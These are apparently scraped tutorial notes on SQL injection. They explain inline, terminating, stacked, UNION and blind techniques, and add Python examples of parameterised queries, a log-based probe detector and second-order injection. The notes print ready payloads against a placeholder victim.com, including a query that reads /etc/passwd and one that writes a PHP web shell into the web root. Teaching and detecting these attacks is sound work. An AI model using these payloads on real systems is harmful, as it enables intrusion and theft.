SQL injection attacks and defenses

Source: Internet
Author: User
Tags: benchmark, case statement, microsoft sql server

Partial notes ...

What is SQL injection?

A simple example: a shopping site lets users search for products whose price is below a value they enter, for example 100.

But suppose the user enters this instead:

100.00' OR '1'='1

The resulting SQL is:

SELECT * FROM ProductsTbl WHERE Price < '100.00' OR '1'='1' ORDER BY ProductDescription;

which returns every product in the table.

Another example: user authentication requires a user name and a password.

If the user injects code into the password field, the query becomes:

SELECT userid FROM cmsusers WHERE user = 'foo' AND password = 'password' OR '1'='1';

Because the OR '1'='1' condition is always true, the check passes without a valid password.
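The authentication bypass above comes from building the statement by string concatenation. The following is an added example (not code from the original page) with a constructed in-memory SQLite table named cmsusers, showing the concatenated query beside a parameterised one that is given the same password input:

```python
import sqlite3


def make_db():
    # Constructed sample data: an in-memory cmsusers table with one account.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cmsusers (userid INTEGER, user TEXT, password TEXT)")
    conn.execute("INSERT INTO cmsusers VALUES (1, 'foo', 's3cret')")
    return conn


def login_vulnerable(conn, user, password):
    # The password value becomes part of the SQL text, so a quote in it
    # rewrites the WHERE clause: ... AND password = 'x' OR '1'='1'
    sql = ("SELECT userid FROM cmsusers WHERE user = '" + user +
           "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, user, password):
    # Parameterised query: the values travel separately from the SQL text,
    # so the same input is compared literally against the password column.
    sql = "SELECT userid FROM cmsusers WHERE user = ? AND password = ?"
    row = conn.execute(sql, (user, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    injected = "x' OR '1'='1"   # the password the page's example injects
    print(login_vulnerable(conn, "foo", injected))  # 1: logged in without the password
    print(login_safe(conn, "foo", injected))        # None: rejected
    print(login_safe(conn, "foo", "s3cret"))        # 1: the genuine password still works
```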

Injection types

Inline SQL injection

In inline injection, SQL code is inserted into the query and the original query is still executed in full.

String inline injection

Example

With the following SQL, every password in the Users table is updated to new_password, which is quite serious:

UPDATE Users SET Password='new_password' WHERE Username='bob' AND Password='old_password' OR '1'='1'

Numeric inline injection

Note that when injecting into a numeric value you do not need the opening and closing single-quote delimiters.

SELECT * FROM Messages WHERE uid=1 OR 1=1 ORDER BY received;

Because the OR 1=1 condition is injected, the database returns all rows in the Messages table, not just the rows sent to one user.

Terminating SQL injection

In terminating SQL injection, the injected code ends the original query and comments out the remainder of the original statement.

Example

Injecting the string ' or 1=1;-- gives:

SELECT * FROM Administrators WHERE username = '' OR 1=1; -- ' AND password = '';

Because the 1=1 condition is always true, the statement returns all rows in the Administrators table.

SELECT * FROM Administrators WHERE username = 'admin' /*' AND password = '*/'';

Sometimes you may find that you cannot use the double-hyphen (--) comment. In that case you can replace it with a multi-line comment (/* */).
This technique requires multiple vulnerable parameters, and you need to understand where those parameters sit in the SQL statement.

Executing multiple statements

SQL Server 6.0 introduced server-side cursors into its architecture, allowing strings containing multiple statements to be executed on the same connection handle.
All SQL Server versions after 6.0 support this feature and allow statements such as the following to be executed:
SELECT foo FROM bar; SELECT foo2 FROM bar2;

MySQL also introduced this feature in version 4.1 and later, but it is not enabled by default.

To take advantage of this technique you first need to be able to terminate the first statement, after which any SQL code can be appended.

Example

http://www.victim.com/search.php?s=test'; SELECT '<?php echo shell_exec($_GET["cmd"]);?>' INTO OUTFILE '/var/www/victim.com/shell.php';--

Time delay

Time delay is a powerful technique: although the web server may hide errors or data, it still has to wait for the database to return its results, so a delay can be used to confirm that SQL injection exists. This technique is particularly suitable for blind SQL injection.

Microsoft SQL Server contains a built-in command that introduces a delay into a query: WAITFOR DELAY 'hours:minutes:seconds'.
For example, if the following request is sent to the victim web server, the response takes approximately 5 seconds:

http://www.victim.com/basket.aspx?uid=; waitfor delay '0:0:5'; --

The delay in the server response confirms that we are injecting SQL code into the back-end database.

MySQL has no command equivalent to WAITFOR DELAY, but a function that takes a long time to run can be used to introduce the delay. The BENCHMARK function is a good choice:

mysql> SELECT BENCHMARK(10000000,ENCODE('hello','mom'));

Injection attack approach

The first step is to determine exactly which database the back end is, and which version.
Which method to use depends on whether the web server returns back-end errors or values to you.

The basic method is to test with syntax that differs between databases;

for example, the string concatenation syntax is different for each database.

Extracting data through UNION statements

With UNION you can append your own SELECT and retrieve more information:

SELECT column-1,column-2,...,column-N FROM Table-1 UNION SELECT column-1,column-2,...,column-N FROM Table-2

The limitations of this method are:

- The two queries must return exactly the same number of columns.
- The data in the corresponding columns of the two statements must be of the same (or at least compatible) types.

How do you ensure that your SELECT and the original SELECT have the same column count and types?

Try each count in turn:

http://www.victim.com/products.asp?id=A+union+select+NULL--
http://www.victim.com/products.asp?id=A+union+select+NULL,NULL--
http://www.victim.com/products.asp?id=A+union+select+NULL,NULL,NULL--

Keep adding columns until the query no longer returns an error.

The same applies to types:

http://www.victim.com/products.asp?id=A+union+select+'test',NULL,NULL,NULL
http://www.victim.com/products.asp?id=A+union+select+NULL,'test',NULL,NULL

If no error is returned, the type of that column matches.

Example

For instance, the following URL retrieves both the name of the current user and the name of the current database:

http://www.victim.com/products.asp?id=12+union+select+NULL,system_user,db_name(),NULL

Using conditional statements

The conditional syntax differs between databases.

Approach 1: time-based

On SQL Server, for instance, one of the first things you might want to know is whether the user performing the queries is the system administrator account, sa:

http://www.victim.com/products.asp?id=12;if+(system_user='sa')+waitfor+delay+'0:0:5'--

Approach 2: error-based

http://www.victim.com/products.asp?id=12/is_srvrolemember('sysadmin')

If the function returns 1, 12/1 is still 12; if it returns 0, 12/0 raises a division-by-zero error, so the function's return value can be inferred from whether an error occurs.

As an example, let's see how a CASE statement can be used to check, in our e-commerce application, whether the current user is sa:

http://www.victim.com/products.asp?id=12/(case+when+(system_user='sa')+then+1+else+0+end)

Approach 3: content-based

This approach avoids generating errors:

http://www.victim.com/products.asp?id=12%2B(case+when+(system_user+=+'sa')+then+1+else+0+end)

This is like the case above, except that instead of raising an error the expression evaluates to 12 or 13, so the content of the page that comes back reveals the answer.

Working with strings

http://www.victim.com/search.asp?brand=acme

is equal to

http://www.victim.com/search.asp?brand=acm'%2b'e or http://www.victim.com/search.asp?brand=ac'%2b'm'%2b'e

because %2b is the URL encoding of +.

It is also equivalent to

http://www.victim.com/search.asp?brand=ac'%2bchar(109)%2b'e

The condition can then be injected as follows:

http://www.victim.com/search.asp?brand=ac'%2bchar(108%2b(case+when+(system_user+=+'sa')+then+1+else+0+end))%2b'e

Depending on the condition, this is equivalent to

http://www.victim.com/search.asp?brand=acme

or

http://www.victim.com/search.asp?brand=acle

The above attack only obtains 1 bit of data; it can be extended to determine LEN(system_user) by binary search:

http://www.victim.com/products.asp?id=10/(case+when+(len(system_user)+>+8)+then+1+else+0+end)

Binary search can then be used to find each character:

http://www.victim.com/products.asp?id=12/(case+when+(ascii(substring(system_user,1,1))+>+128)+then+1+else+0+end)
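Seen from the defending side, the probes described in the time delay, UNION and conditional sections above (WAITFOR DELAY and BENCHMARK, UNION SELECT NULL column-count probing, CASE-based inference, and the comment terminators) leave recognisable traces in web-server logs. The following detector is an added example, not code from the original page; it assumes a constructed common-log-format variant with a trailing response time in milliseconds, and the sample log lines are constructed.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Probe patterns from the techniques above, matched against the URL-decoded
# query string.  Comment terminators alone are too common to act on, so they
# only corroborate a stronger match.
STRONG = {
    "delay primitive": re.compile(r"waitfor\s+delay\s+'|benchmark\s*\(\s*\d+\s*,", re.I),
    "union column probe": re.compile(r"union\s+select\s+null(\s*,\s*null)*", re.I),
    "case inference": re.compile(r"case\s+when\s+.+\s+then\s+\d+\s+else\s+\d+\s+end", re.I),
}
TERMINATOR = re.compile(r"--|/\*|#")
# Assumed log format (constructed): common log format plus response time in ms.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) '
                    r'(?P<url>\S+) \S+" (?P<status>\d{3}) \S+ (?P<ms>\d+)$')


def analyse(lines, slow_ms=4000):
    """Return one record per suspicious request, with the reasons it was flagged."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # unexpected format: skip, do not crash
        query = unquote_plus(urlsplit(m["url"]).query)
        reasons = [name for name, rx in STRONG.items() if rx.search(query)]
        if not reasons:
            continue
        if TERMINATOR.search(query):
            reasons.append("comment terminator")
        if int(m["ms"]) >= slow_ms:       # a delay probe that actually delayed
            reasons.append("slow response")
        hits.append({"ip": m["ip"], "url": m["url"], "query": query, "reasons": reasons})
    return hits


# Constructed sample log lines (not real traffic) mirroring the page's probe URLs.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /basket.aspx?uid=;+waitfor+delay+%270:0:5%27;-- HTTP/1.1" 200 512 5012',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /products.asp?id=12+union+select+NULL,NULL,NULL-- HTTP/1.1" 500 301 21',
    '203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /products.asp?id=12/(case+when+(system_user=%27sa%27)+then+1+else+0+end) HTTP/1.1" 200 2048 19',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /products.asp?id=12 HTTP/1.1" 200 2048 17',
]

if __name__ == "__main__":
    for h in analyse(SAMPLE_LOG):
        print(h["ip"], h["reasons"], h["query"])
```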

Exploiting the operating system

Accessing the file system

Read

The LOAD_FILE function also handles binary files transparently, which means that with a little finesse we can use the function to read binary files from the remote host:

For example:

' UNION SELECT LOAD_FILE('/etc/passwd') #

INSERT INTO foo SET line=LOAD_FILE('/tmp/temp.bin');

Write

aaa' UNION SELECT NULL,'SensePost 2008\n' INTO DUMPFILE '/tmp/sp.txt' #

Executing operating system commands

Exploiting Second-order SQL Injection

In the first request, the attacker only submits the attack string, which the application stores, for example in the database.

In the second request, the stored string is read back from the database and used in a query, triggering its execution; this is where the real attack happens.

Finding Second-order Vulnerabilities

Second-order SQL injection is more difficult to detect than first-order vulnerabilities, because the exploit is submitted in one request and executed in the application's handling of a different request.
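As an added example (not code from the original page), the following constructs a small SQLite users table and a register-then-change-password flow: the first request stores the input safely, but the second request trusts the value it reads back and concatenates it into its UPDATE, so the stored string fires there. The hardened handler binds the stored value as a parameter as well.

```python
import sqlite3


def make_db():
    # Constructed sample data: a users table with one privileged account.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'adminpw')")
    return conn


def register(conn, username, password):
    # First request: parameterised INSERT, so a quote or comment marker in the
    # username is stored literally and nothing goes wrong yet.
    conn.execute("INSERT INTO users VALUES (?, ?)", (username, password))


def stored_username(conn, username):
    row = conn.execute("SELECT username FROM users WHERE username = ?",
                       (username,)).fetchone()
    return row[0] if row else None


def change_password_vulnerable(conn, username, old_pw, new_pw):
    # Second request: the username read back from the database is treated as
    # trusted and concatenated into the UPDATE.  A stored "admin'--" turns the
    # WHERE clause into username = 'admin' with the password check commented out.
    stored = stored_username(conn, username)
    sql = ("UPDATE users SET password = '" + new_pw + "' WHERE username = '" +
           stored + "' AND password = '" + old_pw + "'")
    conn.execute(sql)


def change_password_safe(conn, username, old_pw, new_pw):
    # Data that came from the database is still data: bind it as a parameter.
    stored = stored_username(conn, username)
    conn.execute("UPDATE users SET password = ? WHERE username = ? AND password = ?",
                 (new_pw, stored, old_pw))


def password_of(conn, username):
    row = conn.execute("SELECT password FROM users WHERE username = ?",
                       (username,)).fetchone()
    return row[0] if row else None
```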
